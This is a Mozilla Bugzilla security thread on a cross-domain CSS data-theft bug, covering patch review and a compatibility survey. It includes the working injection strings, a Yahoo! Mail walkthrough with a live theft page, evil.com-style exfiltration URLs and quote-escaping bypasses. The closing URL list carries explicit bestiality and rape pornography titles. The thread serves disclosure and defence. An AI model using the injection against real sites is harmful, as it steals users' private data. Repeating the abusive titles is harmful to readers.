Bugzilla@Mozilla – Bug 524223
Cross-domain data theft using CSS
Last modified: 2010-08-20 18:36:20 PDT
Summon comment box
From Chris Evans: The attack involves cross-domain CSS stylesheet loading. Because the CSS parser is very lax, it will skip over any amount of preceding and following junk, in its quest to find a valid selector. Here is an example of a valid selector: body { background-image: url('http://www.evil.com/blah'); } If a construct like this can be forced to appear anywhere in a cross-domain document, then cross-domain theft may be possible. The attacker can introduce this construct into a page by injecting two strings: 1) {}body{background-image:url('http://google.com/ (Note that the seemingly redundant {} is to resync the CSS parser to make sure the evil descriptor parses properly. Further note that having the url start like a valid url is required to steal the text in some browsers). 2) ');} Any anything between those two strings will then be cross-domain stealable! The data is stolen cross domain with e.g. window.getComputedStyle(body_element, null).getPropertyValue('background-image'); (This works in most browsers; for IE, you use ele.currentStyle.backgroundImage) There are a surprising number of places in internet sites where an attacker can do this. It can apply to HTML, XML, JSON, XHTML, etc. At this point, an example is probably useful. To set up for this example, you need: a) Get a Yahoo! Mail account. b) Make sure you are logged into it. c) E-mail the target victim Yahoo! account with the subject ');} d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate one). e) E-mail the target victim Yahoo! account with the subject {}body{background-image:url('http://google.com/ f) Send victim to theft page https://cevans-app.appspot.com/static/yahoocss.html g) The stolen text shown is achieved via cross-domain CSS theft. Other good examples I've had success with are social networking sites, where the attacker gets to leave arbitrary-text comments which are rendered on the victim's trusted page. The main common construct that prevents exploitation is newlines. Obviously, newlines cannot be considered a defense! Escaping or encoding of quote characters can also interfere with exploitation. One useful trick: if ' is escaped, use " to enclose the CSS string. Part 2 (on possible solutions) to follow. Possible solutions. First, there are some solutions it is easy to reject: 1) Restrict read of CSS text if it came from a different domain. This is a useful defense that I filed a while ago in a different bug. But it will not help in this case. The attacker can simply use http://www.attacker.com/ as a prefix for the background-image value, and wait for the HTTP GET to arrive which includes the stolen text in the payload. 2) Do not send cookies for cross-domain CSS loads. This probably breaks a load of sites? It is certainly a riskier approach. I have not dared try it! The solution that I'm playing with is as follows: - Activate "strict MIME type required" in the event that the CSS was loaded (via link tag or @import) as a cross-domain resource. - Also, crash hard if a CSS load fails due to strict MIME type test failure. I've been running my build locally with these changes for a few days and there seems to be some merit in this approach, i.e. my browser hasn't crashed apart from when I hit my attack URLs. I see that WebKit has a history of defaulting to "strict MIME type required" for _all_ CSS loads, and that historically broke some sites like dell.com and was reverted. Perhaps the web at large now has its MIME types in order well enough to at least enforce strict for cross-domain CSS loads? If too much breaks, we have the additional level we can introduce of trying to parse the cross-domain CSS but bailing on first syntax error. I'd like to avoid a test that is going that deep into nuance, however.
Marking sg:moderate as it could lead to theft of confidential information but is mitigated by the need to inject attacker controlled content into page being viewed on victim site.
(In reply to comment #0) > Perhaps the web at large now has its MIME types in order well enough to at > least enforce strict for cross-domain CSS loads? This seems like something that we could try. Probably we'd want to use the eTLD service, but we could avoid doing that until we've already found that we loaded a stylesheet and it's not text/css . I suspect the big question would be whether sites like akamai send the correct MIME type reliably. The other question is whether we'd have a problem with the things that we now accept in standards mode: empty content-type and UNKNOWN_CONTENT_TYPE, and whether we'd need to change our handling of those in order to prevent this attack. (Probably not in most cases, but there could be some; then again, one could easily argue it's a bug in the site if it's putting content it wants interpreted in a specific way in a response with no Content-Type specified.) The relevant code is in SheetLoadData::OnStreamComplete in nsCSSLoader.cpp, though we probably also have to worry about the hint type set in CSSLoaderImpl::LoadSheet. Boris might know more.
An update. I've crunched some data on 500,000 URLs and will have a recommendation on how to close the hole without breaking compatibility shortly :) Regarding comment #2 - I'd see it as a bug in a site if it had a missing content-type, or a poorly specified content type.
I fixed this properly in WebKit (pending review). I mined 500,000 URLs to see what sort of cross-domain CSS load + MIME braindamage exists. There's a little bit, e.g. configure.dell.com loading text/plain CSS. A bunch of sites do this. A bunch of other sites load application/octet-stream CSS and even a fair bit of text/html CSS. Therefore, the solution devised was: - Reject a CSS load if all of these are met: a) It is cross-domain load (making sure a redirect does not confuse the domain check)! b) Not a valid MIME type (text/css, application/x-unknown-content-type or empty). c) The alleged CSS does not start with a syntactically valid CSS construct. The above rules will block the attack because an HTML, XML etc. header will always cause a broken first CSS descriptor. And the above rules are compatible. Out of the 500,000 URLs, just one very broken site has its look changed a little by this change: http://practiceexam.keys2drive.ca/quiz.php which does cross-domain CSS load for a text/html resource which has a CSS resource after a <style> tag. That is highly broken. Regarding disclosure, there is no particular co-ordination. Fix and disclose when you are ready. Please credit "Chris Evans, Google Security Team". This issue will be disclosed no later that 16th April 2009, and quite probably a lot sooner.
(In reply to comment #4) > This issue will be disclosed no later that 16th April 2009, and quite probably > a lot sooner. 16th April 2010, I hope you mean?
(In reply to comment #0) > At this point, an example is probably useful. To set up for this example, you > need: > a) Get a Yahoo! Mail account. > b) Make sure you are logged into it. > c) E-mail the target victim Yahoo! account with the subject > ');} > d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate > one). > e) E-mail the target victim Yahoo! account with the subject > {}body{background-image:url('http://google.com/ > f) Send victim to theft page > https://cevans-app.appspot.com/static/yahoocss.html > g) The stolen text shown is achieved via cross-domain CSS theft. I think, in a conformant CSS implementation, this will only work if there are no newlines or single quotes between the content from (e) and the content from (c), so the attack is rather constrained (though still, I think, worth fixing).
@5: Yes, 16th April 2010 as an upper bound. I wouldn't be surprised if WebKit-based browsers update sooner, though, since the WebKit patch should land tonight. I also worry that people monitor WebKit commits for additions to the LayoutTests/http/tests/security directory. @6: Correct about newlines. Single quotes do not pose a problem for the attacker, as there is the option to enclose the CSS string within double quotes. A single quote within a double quote (and visa versa) is fine. Also, I've found that "no newlines" is quite common in data access APIs that spit out authenticated data as JSON or XML.
Not blocking 1.9.2, but we should definitely come up with a fix ASAP and backport that fix to some 1.9.2 update. The plan in comment #4 looks good to me. Zack, can you take this?
Sure, I'm already messing with the CSSLoader, this shouldn't be too hard. @cevans: would you be willing to let us have the tests you wrote for webkit, & if so, could you attach them to this bug?
Created attachment 411763 [details] [review] partial patch (CSSLoader changes only) This is an incomplete patch. It compiles, and it contains the code necessary to detect the conditions laid out in comment #4 and notify the parser, but I haven't actually made the parser do anything with this yet. That's going to be rather longer and less interesting, alas. I'm asking for review on this because I'm not sure I did the cross-domain check correctly nor in all the places where it needs to happen. Tangentially, this patch (as with anything that touches nsICSSParser) is going to conflict with my changes in bug 523496. I'd kinda like to land that first.
Comment on attachment 411763 [details] [review] partial patch (CSSLoader changes only) This doesn't actually work right, since you're doing the same-origin check before you start the load. In particular, the attacker could link to his own server (same-origin for purposes of this check) and then issue an HTTP 3xx response to redirect to the server being attacked. The code here wouldn't detect that. A better way to handle this, probably is to compare mLoaderPrincipal (which is the principal of the entity that started the load) to |principal| (which is the principal of the stylesheet, now that we've got its data and know exactly where that came from) in SheetLoadData::OnStreamComplete. Presumably a Subsumes() check. Note that mLoaderPrincipal may be null, in which case the load wasn't triggered on behalf of any web page and should be allowed.
Oh, and if you want to land this on branches you need a version that doesn't go on top of bug 523496 anyway, right?
As requested, I'll upload the WebKit patch (including test) that is currently in-review.
Created attachment 411823 [details] [review] WebKit patch for reference
An update on disclosure: Since this is a tricky issue, there will be guaranteed no disclosure prior to Dec 28th 2009. If you want to fix this sooner than then -- please do, and push your fix out to users. Just refrain from mentioning this in the release notes or security notes. Non-prominent disclosure via source repository comments is fine.
(In reply to comment #11) > (From update of attachment 411763 [details] [review]) > This doesn't actually work right, since you're doing the same-origin check > before you start the load. In particular, the attacker could link to his own > server (same-origin for purposes of this check) and then issue an HTTP 3xx > response to redirect to the server being attacked. The code here wouldn't > detect that. I was afraid there might be a problem like that. Thanks. > A better way to handle this, probably is to compare mLoaderPrincipal (which is > the principal of the entity that started the load) to |principal| (which is the > principal of the stylesheet, now that we've got its data and know exactly where > that came from) in SheetLoadData::OnStreamComplete. Presumably a Subsumes() > check. Note that mLoaderPrincipal may be null, in which case the load wasn't > triggered on behalf of any web page and should be allowed. Ok. That should be less invasive, too, which is nice. I see that in some circumstances mLoaderPrincipal may be a null *pointer*, but do I have to worry about null *principals* in here as well? (In reply to comment #12) > Oh, and if you want to land this on branches you need a version that doesn't go > on top of bug 523496 anyway, right? Bleah, good point. I'll keep developing it in isolation then.
(In reply to comment #16) > I see that in some circumstances mLoaderPrincipal may be a null *pointer*, but > do I have to worry about null *principals* in here as well? |principal| is guaranteed non-null here, after the early-return branch that logs "couldn't get principal" has not been taken. I assume that's what you were asking about? If you were asking about nsNullPrincipal, then you don't need to worry about it. mLoaderPrincipal (and |principal|, for that matter) may be nsNullPrincipal and that's ok. The security checks will do the right thing with that.
(In reply to comment #17) > If you were asking about nsNullPrincipal, then you don't need to worry about > it. mLoaderPrincipal (and |principal|, for that matter) may be nsNullPrincipal > and that's ok. The security checks will do the right thing with that. Yes, I was asking about nsNullPrincipal. Thanks for clarifying. My other big concern at this stage is here: @@ CSSLoaderImpl::LoadSheet - rv = ParseSheet(converterStream, aLoadData, completed); + // XXX Can we ever have a cross-domain, improper-MIME, synchronous load? + rv = ParseSheet(converterStream, aLoadData, completed, PR_FALSE); I'm not clear on how synchronous loads get triggered or what they're used for. Other things in this function imply that they are only for UA sheets, so we don't have to worry about cross-domain, but I'm not sure.
(In reply to comment #18) > I'm not clear on how synchronous loads get triggered or what they're used for. LoadSheetSync is a public nsICSSLoader API, so any C++ code that really wants to can use it... Current consumers in mozilla-central (excluding tests) are: * nsChromeRegistry: should only happen for chrome:// URIs * nsHTMLEditor: should only happen for editor-provided URIs * nsLayoutStyleSheetCache: scrollbars.css, forms.css, ua.css, quirk.css, userContent.css, useChrome.css * nsStyleSheetservice: extension-provided UA and user sheets * nsDocumentViewer: usechromesheets attribute on chrome <xul:browser/iframe> * nsXBLPrototypeResources: chrome:// URIs only. * nsXBLResourceLoader: chrome:// URIs only. * nsXMLContentSink: catalog sheets only (in practice, mathml.css) * nsDocument: catalog sheets If LoadSheetSync ever gets a URI under control of untrusted content that's a serious bug, fwiw.
Created attachment 412759 [details] [review] complete patch Here's a complete patch with the necessary parser changes and tests. I'm not sure I implemented exactly the same parsing semantics that cevans did for Webkit, but I doubt that the precise rules matter too much. If anyone can suggest a way to avoid adding 48 tiny little files to layout/style/tests I am all ears. A remaining concern: does the error cleanup logic in SheetComplete() ensure that Javascript never sees the aborted sheet, or do we need to undo actions in the parser as well?
Comment on attachment 412759 [details] [review] complete patch I think I'd prefer s/raconian/raconianParsing/ throughout in variable and argument names. >+++ b/layout/style/nsCSSParser.cpp >+// Draconian error handling is a nonstandard mode used to close a >+// data-theft loophole. A quirks mode document can declare any Web >+// resource to be its style sheet; regardless of that resource's MIME >+// type, we'll try to parse it as CSS. The normal CSS error recovery >+// rules give the attacker a fairly decent chance of finding a valid >+// style rule or two in there Not sure how much of that comment we should leave in when we land if we're trying to not disclose this bug... I guess there's nothing there that describes the actual technique used here, but still please double-check with Chris? > and the text of that rule then becomes >+// accessible to the attacking document via the CSSOM. As a matter of fact, no it does not. We enforce same-origin checks on CSSOM access. What the attack here does is to get parts of the data in the attacked document into a url() production, at which point the browser sends it to a server of the attacking document's choise as part of a GET. >+ // XXX If draconian error handling triggered, should we undo all changes >+ // to the style sheet? nsI[CSS]StyleSheet doesn't have methods for that... We probably need to do that, yes. Add a method? It can throw if the sheet is complete, to make sure no one but us uses it. As far as that goes, we might kick off @import loads before we hit a parse error. Do we want to abort them? They could in theory be communicating information to the server... But again, check with Chris? It sounds like his patch only aborts if the first rule it tries to parse doesn't parse; once it's parsed a rule it just follows normal CSS error-recovery. That would seem to be sufficient to me. I didn't look at the tests very carefully. > does the error cleanup logic in SheetComplete() ensure that Javascript never > sees the aborted sheet It does not, however in the cross-domain case JS can't access the sheet's rules directly anyway, per above.
(In reply to comment #21) > (From update of attachment 412759 [details] [review]) > I think I'd prefer s/raconian/raconianParsing/ throughout in variable and > argument names. Ok. > >+++ b/layout/style/nsCSSParser.cpp > >+// Draconian error handling is a nonstandard mode [...] > > Not sure how much of that comment we should leave in when we land if we're > trying to not disclose this bug... I guess there's nothing there that > describes the actual technique used here, but still please double-check > with Chris? Well, he's reading the bug... Chris? > > and the text of that rule then becomes > >+// accessible to the attacking document via the CSSOM. > > As a matter of fact, no it does not. We enforce same-origin checks on CSSOM > access. Huh, Chris said in the original description that it's a JS-based attack: # The data is stolen cross domain with e.g. # window.getComputedStyle(body_element, null) # .getPropertyValue('background-image'); # (This works in most browsers; for IE, you use # ele.currentStyle.backgroundImage) Maybe getComputedStyle is not a "CSSOM" access in the strict sense...? > What the attack here does is to get parts of the data in the attacked > document into a url() production, at which point the browser sends it to a > server of the attacking document's choise as part of a GET. The existing patch may not protect against that scenario, depending on when the GET fires. I *think* it never happens during parse, except maybe for @font-face, but I'm not sure that's a safe "except". > >+ // XXX If draconian error handling triggered, should we undo all changes > >+ // to the style sheet? nsI[CSS]StyleSheet doesn't have methods for that... > > We probably need to do that, yes. Add a method? It can throw if the sheet is > complete, to make sure no one but us uses it. It occurs to me that the only things that will get into the style sheet are from syntactically valid constructs preceding the first syntax error. It kinda sounded like Chris's proposal was for a weaker rule than the one I implemented: if the *first* construct in the document is ill-formed, bail out, otherwise do normal CSS error recovery. I could change it to be like that, and then we wouldn't need this additional sheet-rollback handling. But I'm not sure it's enough protection. Chris, what exactly did you make Webkit do? I'm not familiar enough with Webkit's CSS parser to tell from the patch.
> Maybe getComputedStyle is not a "CSSOM" access in the strict sense...? Ah, yeah. That's true. You can't access the rules directly, but you can observe their effect on the computed style... > I *think* it never happens during parse @import gets happen during parse. Or at least the channel's asyncOpen is called during parse. @font-face is not. > It occurs to me that the only things that will get into the style sheet are > from syntactically valid constructs preceding the first syntax error. Yes. > It kinda sounded like Chris's proposal was for a weaker rule That's the impression I got too. Looking at the attached webkit patch, that seems to be exactly what's going on to me: + if (m_styleSheet && !m_hadSyntacticallyValidCSSRule) + m_styleSheet->setHasSyntacticallyValidCSSHeader(false); (in "invalid block hit") and then: + if (crossOriginCSS && !validMIMEType && !m_sheet->hasSyntacticallyValidCSSHeader()) + m_sheet = CSSStyleSheet::create(this, url, charset); (which replaces m_sheet with a blank sheet). I'm not sure what sets m_hadSyntacticallyValidCSSRule; that part seems to be autogenerated lexer code.
@Zack, #22: feel free to commit whatever comments you want. If news breaks out, then so be it. Co-oridating something like this across a million browser vendors (some of whom move at glacier speeds) is just too complicated. @Boris, Zack #22 & #23: it's not necessarily a JS-based attack. My demo is JS-based because that is the easiest demo. However, imagine if getComputedStyle() did not exist. The attacker can still steal the same data because the background-image URL fetch will send the data in the GET request to evil.com.
On Mon, Nov 23, 2009 at 10:55 AM, Zack Weinberg <zweinberg@mozilla.com> wrote: > I'm still a little confused about one nuance of the CSS cross-site data > theft mitigation you proposed in Mozilla bug 524223. Suppose that we > load a cross-domain URI as a style sheet, it has the wrong MIME type, > the *first* complete construct in the file is a valid CSS rule but > there's a syntax error after that point. Should we still disregard the > whole sheet? Or should we revert to regular CSS error handling if the > first complete construct is well-formed? The latter. The check is, in concept, a "header" check. Also, we distinguish a syntax error from a sematic error (such as unknown property). The latter should not be considered an error.
Comment on attachment 412759 [details] [review] complete patch I've thought about this for a bit, and I've decided that I don't like the idea of having different behavior based on whether the first rule (or entirety) of a style sheet parses correctly. The first reason that I think this is bad is that I think, in general, heuristics are bad platform. By heuristics, I mean complex mechanisms intended to devine intent out of existing content on the Web (such as what Opera does with media="handheld", or this). While they're fine at handling existing content (and that's what they're designed for), I think they're bad for two reasons: (1) they provide a bizarre API for future authors, who become unable to build a mental model of how the Web as a platform behaves, and (2) it makes it more complex for new entrants in the Web browser market, since they have to reverse-engineer these heuristics for compatibility with existing content. Second, I don't like the implications of such a change for CSS error handling rules. CSS depends for future extensibility on the idea that new constructs added to the language will be skipped in well-defined ways. Taking this approach would break this and make Web authors much more hesitant to use future CSS language constructs as they are added, for fear of causing entire stylesheets to be ignored in older browsers that don't support those constructs. So, on that basis, I'm denying superreview. Instead, I think that we should take a slightly bigger short-term risk (for longer-term gain) and stop processing all cross-domain stylesheet loads with mismatched MIME types.
(In reply to comment #26) > Instead, I think that we should take a slightly bigger short-term risk (for > longer-term gain) and stop processing all cross-domain stylesheet loads with > mismatched MIME types. I'm happy with this, and will add that I was not enthusiastic about being able to get the parser changes required for cevans' proposed rule into 3.6.x. Your somewhat more strict rule, on the other hand, is much easier to implement with the parser we've got (indeed, it requires no changes to nsCSSParser at all). cevans: from that data set you crunched, how many sites were doing MIME-mislabeled, cross-domain loads of *syntactically valid* CSS?
I'll paste in the list of URLs. This list is for URLs I found that do cross-domain CSS loads with invalid MIME type. It's 83 URLs out of about 500,000. In the majority of cases, the CSS is syntactically valid. I think about 3 of those 83 returned syntactically _in_valid CSS in the form of CSS surrounded by <style> and a text/html MIME type. Note that breaking all of these URLs would have consequences. For example, configure.dell.com is regrettably broken and uses the text/plain MIME type for cross-domain CSS in its "configure your PC" pages. That would be a significant breakage. Although presumably dell.com would fix it pretty damn pronto if their broken-yet-money-making site started failing to render in a browser as popular as Firefox. Also beware that some of these URLs are porn URLs with pretty rough content. Well, I think that's clear from the text in the URLs themselves :-) http://ads.lfstmedia.com/fbslot/slot328 http://apps.facebook.com/eltabaco/index.php http://apps.facebook.com/yoursay/ http://configure.dell.com/dellstore/config.aspx http://configure.la.dell.com/dellstore/config.aspx http://configure.la.dell.com/dellstore/poll.aspx http://configure.us.dell.com/dellstore/DiscountDetails.aspx http://configure.us.dell.com/dellstore/config.aspx http://configure.us.dell.com/dellstore/print_summary_details_popup.aspx http://date.bluesystem.ru/ http://date.bluesystem.ru/login.php http://date.bluesystem.ru/members/ http://date.bluesystem.ru/members/who_viewed.php http://date.bluesystem.ru/messages/ http://date.bluesystem.ru/messages/msgs.php http://date.bluesystem.ru/photo/ http://date.bluesystem.ru/search.php http://date.bluesystem.ru/view.php http://date.bluesystem.ru/view_sex.php http://forms.real.com/real/player/blackjack.html http://forms.real.com/real/realone/realone.html http://forum.derwesten.de/viewtopic.php http://info.smmail.cn/jsp/service/LoginInterFace.jsp http://jplanner.travelinenortheast.info/jpclient.exe http://media.paran.com/entertainment/newslist.php http://media.paran.com/entertainment/newsview.php http://media.paran.com/sdiscuss/newshitlist.php http://media.paran.com/sdiscuss/newsview2.php http://media.paran.com/snews/newslist.php http://media.paran.com/snews/newsview.php http://month.gismeteo.ru/ http://month.gismeteo.ru/forecast.php http://news.gismeteo.ru/news.n2 http://practiceexam.keys2drive.ca/quiz.php http://search.chl.it/search.aspx http://search.vampirefreaks.com/search_results.php http://story.bluesystem.org/read.php http://submit.123rf.com/submit/myuploaded.php http://telefilmdb.blogspot.com/ http://www.aif.ru/ http://www.art.com/gallery/id--0/posters_p2.htm http://www.baseball-reference.com/ http://www.baseball-reference.com/minors/player.cgi http://www.baseball-reference.com/pl/player_search.cgi http://www.edurang.net/uview/wrd/run/portal.show http://www.fantatornei.com/calcio/fantalega/gestionelega.asp http://www.google.es/ig/setp http://www.homeportfolio.com/catalog/Listing.jhtml http://www.pleshka.com/ http://www.smmail.cn/smmail/sy/index.html http://www.tabelas.lancenet.com.br/Default.aspx http://www.thongsdaily.com/ http://www.zootube365.com/ http://www.zootube365.com/animal-sex/1/ http://www.zootube365.com/animal-sex/horse-and-woman/1446/ http://www.zootube365.com/animal-sex/rochdale----does-her-pony/9740/ http://www.zootube365.com/animal-sex/woman-raped-by-pig-and-dog/2129/ http://www.zootube365.com/dog-sex/3/ http://www.zootube365.com/dog-sex/3/page/2/ http://www.zootube365.com/dog-sex/3/page/3/ http://www.zootube365.com/dog-sex/3/page/4/ http://www.zootube365.com/dog-sex/dog-cum00/11850/